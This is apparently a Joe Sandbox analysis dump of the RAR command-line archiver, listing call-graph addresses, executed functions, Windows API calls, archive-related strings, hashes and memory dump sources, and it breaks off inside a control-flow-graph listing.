7ff629af166d 39561 7ff629af16d4 39556->39561 39562 7ff629af168e 39556->39562 39557->39556 39566 7ff629b0ca6c 48 API calls 3 library calls 39557->39566 39559 7ff629af1661 39567 7ff629b0cb64 8 API calls 39559->39567 39561->39565 39569 7ff629b0cb64 8 API calls 39561->39569 39562->39565 39568 7ff629b0cb64 8 API calls 39562->39568 39565->39554 39566->39559 39571 7ff629b09143 39570->39571 39572 7ff629b37e95 39570->39572 39571->39470 39573 7ff629b37ec8 68 API calls 39572->39573 39573->39571 39578 7ff629b09920 39574->39578 39583 7ff629b09b45 39574->39583 39575 7ff629b4a610 _handle_error 8 API calls 39576 7ff629b09b61 39575->39576 39576->39464 39579 7ff629b0996d 39578->39579 39580 7ff629b09b75 39578->39580 39590 7ff629b37da8 39578->39590 39579->39579 39597 7ff629b0a0f4 39579->39597 39582 7ff629b37f24 68 API calls 39580->39582 39584 7ff629b09acb 39582->39584 39583->39575 39584->39583 39627 7ff629b34ea8 8 API calls _handle_error 39584->39627 39585 7ff629b099d0 39613 7ff629b37f24 39585->39613 39588->39464 39589->39464 39591 7ff629b37e74 68 API calls 39590->39591 39592 7ff629b37ddc 39591->39592 39593 7ff629b37e74 68 API calls 39592->39593 39594 7ff629b37def 39593->39594 39595 7ff629b4a610 _handle_error 8 API calls 39594->39595 39596 7ff629b37e43 39595->39596 39596->39578 39599 7ff629b0a15c memcpy_s 39597->39599 39598 7ff629b0a358 39650 7ff629b4a774 8 API calls __report_securityfailure 39598->39650 39599->39598 39600 7ff629b0a352 39599->39600 39602 7ff629b0a34d 39599->39602 39603 7ff629b0a192 39599->39603 39649 7ff629b4a774 8 API calls __report_securityfailure 39600->39649 39648 7ff629b4a774 8 API calls __report_securityfailure 39602->39648 39628 7ff629b09dd8 39603->39628 39605 7ff629b0a35e 39608 7ff629b0a1d9 39609 7ff629b09dd8 8 API calls 39608->39609 39610 7ff629b0a2f1 39608->39610 39609->39608 39611 7ff629b4a610 _handle_error 8 API calls 39610->39611 39612 7ff629b0a33b 39611->39612 39612->39585 39614 7ff629b37fb5 39613->39614 39615 7ff629b37f5e 39613->39615 39617 7ff629b3805c GetCurrentProcessId 39614->39617 39621 7ff629b37ff1 39614->39621 39615->39614 39616 7ff629b3b3f0 10 API calls 39615->39616 39618 7ff629b37f72 39616->39618 39620 7ff629b38034 39617->39620 39618->39614 39619 7ff629b37f7e GetProcAddressForCaller GetProcAddress 39618->39619 39619->39614 39620->39584 39620->39620 39621->39620 39651 7ff629b0ca6c 48 API calls 3 library calls 39621->39651 39623 7ff629b3801f 39652 7ff629b0cda4 10 API calls 2 library calls 39623->39652 39625 7ff629b38027 39653 7ff629b0ca40 61 API calls _CxxThrowException 39625->39653 39627->39583 39629 7ff629b09e46 39628->39629 39635 7ff629b09e6e memcpy_s 39628->39635 39630 7ff629b39ce4 8 API calls 39629->39630 39631 7ff629b09e5e 39630->39631 39633 7ff629b39b70 8 API calls 39631->39633 39632 7ff629b09e85 39634 7ff629b39ce4 8 API calls 39632->39634 39633->39635 39637 7ff629b09f97 39634->39637 39635->39632 39636 7ff629b39ce4 8 API calls 39635->39636 39636->39632 39638 7ff629b39b70 8 API calls 39637->39638 39639 7ff629b09fa8 memcpy_s 39638->39639 39640 7ff629b09fb4 39639->39640 39642 7ff629b39ce4 8 API calls 39639->39642 39641 7ff629b39ce4 8 API calls 39640->39641 39643 7ff629b0a0bb 39641->39643 39642->39640 39644 7ff629b39b70 8 API calls 39643->39644 39645 7ff629b0a0c9 39644->39645 39646 7ff629b4a610 _handle_error 8 API calls 39645->39646 39647 7ff629b0a0d8 39646->39647 39647->39608 39648->39600 39649->39598 39650->39605 39651->39623 39652->39625 39653->39620 39654->39488 39656->39489 39658->39509 39659->39504 39660 7ff629af3e71 39661 7ff629af3e81 39660->39661 39663 7ff629af3e89 39660->39663 39661->39663 39671 7ff629b49a14 49 API calls 39661->39671 39664 7ff629af3edd 39663->39664 39665 7ff629af3ea3 39663->39665 39666 7ff629b4a610 _handle_error 8 API calls 39664->39666 39672 7ff629b1331c 48 API calls 2 library calls 39665->39672 39668 7ff629af3eef 39666->39668 39669 7ff629af3eab 39669->39664 39673 7ff629af63e8 8 API calls 2 library calls 39669->39673 39671->39663 39672->39669 39673->39664 39674 7ff629b3bb70 39677 7ff629b3bb80 39674->39677 39686 7ff629b3bae8 39677->39686 39679 7ff629b3bb79 39680 7ff629b3bb97 39680->39679 39691 7ff629b01690 39680->39691 39682 7ff629b3bbc8 SetEvent 39683 7ff629b3bbd5 LeaveCriticalSection 39682->39683 39684 7ff629b3bae8 67 API calls 39683->39684 39684->39680 39695 7ff629b3b974 WaitForSingleObject 39686->39695 39689 7ff629b3bb16 EnterCriticalSection LeaveCriticalSection 39690 7ff629b3bb12 39689->39690 39690->39680 39692 7ff629b016c2 EnterCriticalSection 39691->39692 39694 7ff629b016a4 39691->39694 39692->39682 39692->39683 39694->39692 39703 7ff629b01180 39694->39703 39696 7ff629b3b9b7 39695->39696 39697 7ff629b3b986 GetLastError 39695->39697 39696->39689 39696->39690 39701 7ff629b0ca6c 48 API calls 3 library calls 39697->39701 39699 7ff629b3b9a6 39702 7ff629b0ca40 61 API calls _CxxThrowException 39699->39702 39701->39699 39702->39696 39704 7ff629b011ab 39703->39704 39710 7ff629b011b0 39703->39710 39713 7ff629b017c8 216 API calls 2 library calls 39704->39713 39706 7ff629b0166a 39706->39694 39707 7ff629b26e90 216 API calls 39707->39710 39708 7ff629b26d38 216 API calls 39708->39710 39709 7ff629b01080 48 API calls 39709->39710 39710->39706 39710->39707 39710->39708 39710->39709 39712 7ff629b26fe8 216 API calls 39710->39712 39714 7ff629b017c8 216 API calls 2 library calls 39710->39714 39712->39710 39713->39710 39714->39710 39715 7ff629af7a5b 39716 7ff629af7a60 39715->39716 39717 7ff629b09be0 14 API calls 39716->39717 39719 7ff629af7af7 39716->39719 39717->39719 39718 7ff629af7bda 39721 7ff629afb540 147 API calls 39718->39721 39719->39718 39748 7ff629b11e1c GetFileTime 39719->39748 39722 7ff629af7bf8 39721->39722 39725 7ff629af7c3e 39722->39725 39749 7ff629b49b98 216 API calls 3 library calls 39722->39749 39724 7ff629afb540 147 API calls 39727 7ff629af7c9c 39724->39727 39725->39724 39726 7ff629af7f89 39727->39726 39750 7ff629b16378 39727->39750 39729 7ff629af7cd7 39730 7ff629b16378 4 API calls 39729->39730 39732 7ff629af7cf3 39730->39732 39731 7ff629af7de1 39738 7ff629af7e4e 39731->39738 39755 7ff629b298dc 39731->39755 39732->39731 39734 7ff629af7d38 39732->39734 39735 7ff629af7d59 39732->39735 39737 7ff629b4a444 new 4 API calls 39734->39737 39736 7ff629b4a444 new 4 API calls 39735->39736 39742 7ff629af7d42 std::bad_alloc::bad_alloc 39736->39742 39737->39742 39761 7ff629af1204 48 API calls 39738->39761 39740 7ff629af7eb3 39743 7ff629af7edb 39740->39743 39762 7ff629b29680 39740->39762 39742->39731 39754 7ff629b4ba34 RtlPcToFileHeader RaiseException 39742->39754 39768 7ff629b16424 8 API calls _handle_error 39743->39768 39745 7ff629af7f56 39747 7ff629afb540 147 API calls 39745->39747 39747->39726 39748->39718 39749->39725 39751 7ff629b16396 39750->39751 39753 7ff629b163a0 39750->39753 39752 7ff629b4a444 new 4 API calls 39751->39752 39752->39753 39753->39729 39754->39731 39756 7ff629b29926 39755->39756 39757 7ff629b2993c 39755->39757 39759 7ff629b090b8 75 API calls 39756->39759 39758 7ff629b090b8 75 API calls 39757->39758 39760 7ff629b29934 39758->39760 39759->39760 39760->39738 39761->39740 39766 7ff629b296a4 39762->39766 39763 7ff629b297d7 39764 7ff629b12574 126 API calls 39764->39766 39766->39763 39766->39764 39767 7ff629b49b98 216 API calls 39766->39767 39769 7ff629b16498 72 API calls new 39766->39769 39767->39766 39768->39745 39769->39766 39770 7ff629b59c74 39771 7ff629b59c7c 39770->39771 39772 7ff629b59cbb 39771->39772 39773 7ff629b59cac 39771->39773 39774 7ff629b59cc5 39772->39774 39792 7ff629b5ce08 32 API calls 2 library calls 39772->39792 39791 7ff629b54f3c 15 API calls memcpy_s 39773->39791 39779 7ff629b54b8c 39774->39779 39778 7ff629b59cb1 memcpy_s 39780 7ff629b54bab 39779->39780 39781 7ff629b54ba1 39779->39781 39783 7ff629b54bb0 39780->39783 39789 7ff629b54bb7 __vcrt_getptd_noexit 39780->39789 39782 7ff629b54ab4 setbuf 16 API calls 39781->39782 39788 7ff629b54ba9 39782->39788 39785 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 39783->39785 39784 7ff629b54bf6 39793 7ff629b54f3c 15 API calls memcpy_s 39784->39793 39785->39788 39786 7ff629b54be0 RtlReAllocateHeap 39786->39788 39786->39789 39788->39778 39789->39784 39789->39786 39790 7ff629b536c0 new 2 API calls 39789->39790 39790->39789 39791->39778 39792->39774 39793->39788 39794 7ff629b3a924 39795 7ff629b3a949 snprintf 39794->39795 39796 7ff629b3a97f CompareStringA 39795->39796 39797 7ff629b52450 39804 7ff629b53734 39797->39804 39799 7ff629b52455 39800 7ff629b56998 fflush LeaveCriticalSection 39799->39800 39801 7ff629b52460 39800->39801 39802 7ff629b52488 11 API calls 39801->39802 39803 7ff629b5246c 39801->39803 39802->39803 39809 7ff629b55630 GetLastError 39804->39809 39806 7ff629b5373f 39829 7ff629b54a1c 35 API calls abort 39806->39829 39810 7ff629b55652 39809->39810 39811 7ff629b5564d 39809->39811 39815 7ff629b5569b 39810->39815 39831 7ff629b54b14 15 API calls 3 library calls 39810->39831 39830 7ff629b56cf4 6 API calls __vcrt_uninitialize_ptd 39811->39830 39814 7ff629b55669 39816 7ff629b55671 39814->39816 39832 7ff629b56d4c 6 API calls __vcrt_uninitialize_ptd 39814->39832 39817 7ff629b556b6 SetLastError 39815->39817 39818 7ff629b556a0 SetLastError 39815->39818 39821 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 39816->39821 39834 7ff629b54a1c 35 API calls abort 39817->39834 39818->39806 39825 7ff629b55678 39821->39825 39822 7ff629b55688 39822->39816 39823 7ff629b5568f 39822->39823 39833 7ff629b553e0 15 API calls pre_c_initialization 39823->39833 39825->39817 39827 7ff629b55694 39828 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 39827->39828 39828->39815 39830->39810 39831->39814 39832->39822 39833->39827

                                                              Executed Functions

                                                              Function 00007FF629B054C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                              • API String ID: 0-1628410872
                                                              • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                              • Instruction ID: 31e9027cd6d2d106dda7a59ce2525fddbb22c708e96e014bc1a4096a5a65803f
                                                              • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                              • Instruction Fuzzy Hash: 01C2B322D0C1AEC1FF649E358A442BF2691AFC3786F548235CA0ECA6C5DE6DE544E352
                                                              Function 00007FF629AF1884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                              • API String ID: 0-1660254149
                                                              • Opcode ID: 7f8114fb2b18ce848bc72a4cfe25606c1bd699ff2abb5b225a9875a58ef852b8
                                                              • Instruction ID: 9c163d5aac781ec54cf19bba71fb2c797d462d399a85bd0affd03e62992b8e84
                                                              • Opcode Fuzzy Hash: 7f8114fb2b18ce848bc72a4cfe25606c1bd699ff2abb5b225a9875a58ef852b8
                                                              • Instruction Fuzzy Hash: 47E28A26A09BC689EF20DF25D8441EE37A1FB8678CF454036CE4D87A96DF3AD544E342
                                                              Function 00007FF629B348CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$FileFreeModuleNameVersion
                                                              • String ID: rarlng.dll
                                                              • API String ID: 2520153904-1675521814
                                                              • Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                              • Instruction ID: 2c8255a89bfe3faab2d266a899f3fc0d42e4e2d2dee3da071197147916c14e1d
                                                              • Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                              • Instruction Fuzzy Hash: 7531543161864ACAFF64DF22DC442EE2365FB87786F404135EA4D86A94DF3CE545E701
                                                              Function 00007FF629B146EC Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF629B14620,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B14736
                                                              • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF629B14620,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B1476B
                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF629B14620,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B1477A
                                                              • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF629B14620,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B147A4
                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF629B14620,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B147B2
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                              • String ID:
                                                              • API String ID: 869497890-0
                                                              • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                              • Instruction ID: db3ee4502de70b846415e90bdd9b40482bd078b5fc4de4f9aa49bf6a06e38b45
                                                              • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                              • Instruction Fuzzy Hash: 3B41B23260868A56EE249F25E8402EE63A1FB8B7B6F400331EA7D837C5DF7CE1559701
                                                              Function 00007FF629B0901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                              • String ID:
                                                              • API String ID: 1815803762-0
                                                              • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                              • Instruction ID: c24bd14acace423395bbc7062d3f4dba0b1cfa07fadb13dae5db62da93c5226e
                                                              • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                              • Instruction Fuzzy Hash: BE014B26B1865982EB008B16E94432EA761EBD6FD1F188031DE4D83B68CE79D946D700
                                                              Function 00007FF629AFB540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Char
                                                              • String ID:
                                                              • API String ID: 751630497-0
                                                              • Opcode ID: 544a3eeab9b7365b5894b0fe2e19e3e09eeebdeb3bd711af898eb3b5dda5a90f
                                                              • Instruction ID: 224422440d2ccff53fd280542a50d8f3700f2ca2d604dde392bf2f82adbb2c42
                                                              • Opcode Fuzzy Hash: 544a3eeab9b7365b5894b0fe2e19e3e09eeebdeb3bd711af898eb3b5dda5a90f
                                                              • Instruction Fuzzy Hash: 4F22B032A0868696EF14DF30D8401FEBBB0FB91788F484039DA8D87699DF79E945D742
                                                              Function 00007FF629B1AE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ac23bd2f1d97dba6c8ed780cfc15edbe6b4d609a338b12ac683d3955c16e23e4
                                                              • Instruction ID: c5de04d2f3168d5c81b4c94fbe61b255968cff5a55972c154f20f827dc96be87
                                                              • Opcode Fuzzy Hash: ac23bd2f1d97dba6c8ed780cfc15edbe6b4d609a338b12ac683d3955c16e23e4
                                                              • Instruction Fuzzy Hash: 9F712732A0568946DB44DF26E8153EE7391F7CAF98F044139CB5CCB399DF38A051A7A0
                                                              Function 00007FF629B33EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 635 7ff629b33ea8-7ff629b33f03 call 7ff629b4a5a0 call 7ff629b4c8a0 640 7ff629b33f40-7ff629b33f50 call 7ff629b3a9e8 635->640 641 7ff629b33f05-7ff629b33f3e GetModuleFileNameW call 7ff629b24e14 call 7ff629b3a9c0 635->641 644 7ff629b33f55-7ff629b33f79 call 7ff629b11874 call 7ff629b11e80 640->644 641->644 652 7ff629b33f7f-7ff629b33f89 644->652 653 7ff629b34692-7ff629b346c5 call 7ff629b118ac call 7ff629b4a610 644->653 655 7ff629b33f8b-7ff629b33fac call 7ff629b311c0 * 2 652->655 656 7ff629b33fae-7ff629b33feb call 7ff629b4ec70 * 2 652->656 655->656 668 7ff629b33fef-7ff629b33ff3 656->668 669 7ff629b33ff9-7ff629b3402d call 7ff629b12440 call 7ff629b12150 668->669 670 7ff629b340f2-7ff629b34112 call 7ff629b122e0 call 7ff629b4eb90 668->670 680 7ff629b340bc-7ff629b340e2 call 7ff629b122e0 669->680 681 7ff629b34033 669->681 670->653 679 7ff629b34118-7ff629b34131 call 7ff629b12150 670->679 689 7ff629b34138-7ff629b3414b call 7ff629b4eb90 679->689 690 7ff629b34133-7ff629b34136 679->690 680->668 692 7ff629b340e8-7ff629b340ec 680->692 683 7ff629b3403a-7ff629b3403e 681->683 686 7ff629b34040-7ff629b34044 683->686 687 7ff629b34064-7ff629b34069 683->687 686->687 691 7ff629b34046-7ff629b3405e call 7ff629b52290 686->691 693 7ff629b34097-7ff629b3409f 687->693 694 7ff629b3406b-7ff629b34070 687->694 689->653 708 7ff629b34151-7ff629b3416c call 7ff629b3d54c call 7ff629b4eb88 689->708 697 7ff629b3416f-7ff629b341b1 call 7ff629b3a900 call 7ff629b4eb90 690->697 709 7ff629b34060 691->709 710 7ff629b340a3-7ff629b340a7 691->710 692->653 692->670 695 7ff629b340b7 693->695 696 7ff629b340a1 693->696 694->693 700 7ff629b34072-7ff629b34078 694->700 695->680 696->683 717 7ff629b341c0-7ff629b341d5 697->717 718 7ff629b341b3-7ff629b341bb call 7ff629b4eb88 697->718 701 7ff629b3407a-7ff629b34091 call 7ff629b51700 700->701 702 7ff629b34093 700->702 701->702 715 7ff629b340a9-7ff629b340b5 701->715 702->693 708->697 709->687 710->695 715->680 721 7ff629b341db 717->721 722 7ff629b345f0-7ff629b34624 call 7ff629b33884 call 7ff629b4eb88 * 2 717->722 718->653 726 7ff629b341e1-7ff629b341ee 721->726 758 7ff629b34626-7ff629b34648 call 7ff629b311c0 * 2 722->758 759 7ff629b3464a-7ff629b34691 call 7ff629b4ec70 * 2 722->759 728 7ff629b34508-7ff629b34513 726->728 729 7ff629b341f4-7ff629b341fa 726->729 728->722 731 7ff629b34519-7ff629b34523 728->731 732 7ff629b34208-7ff629b3420e 729->732 733 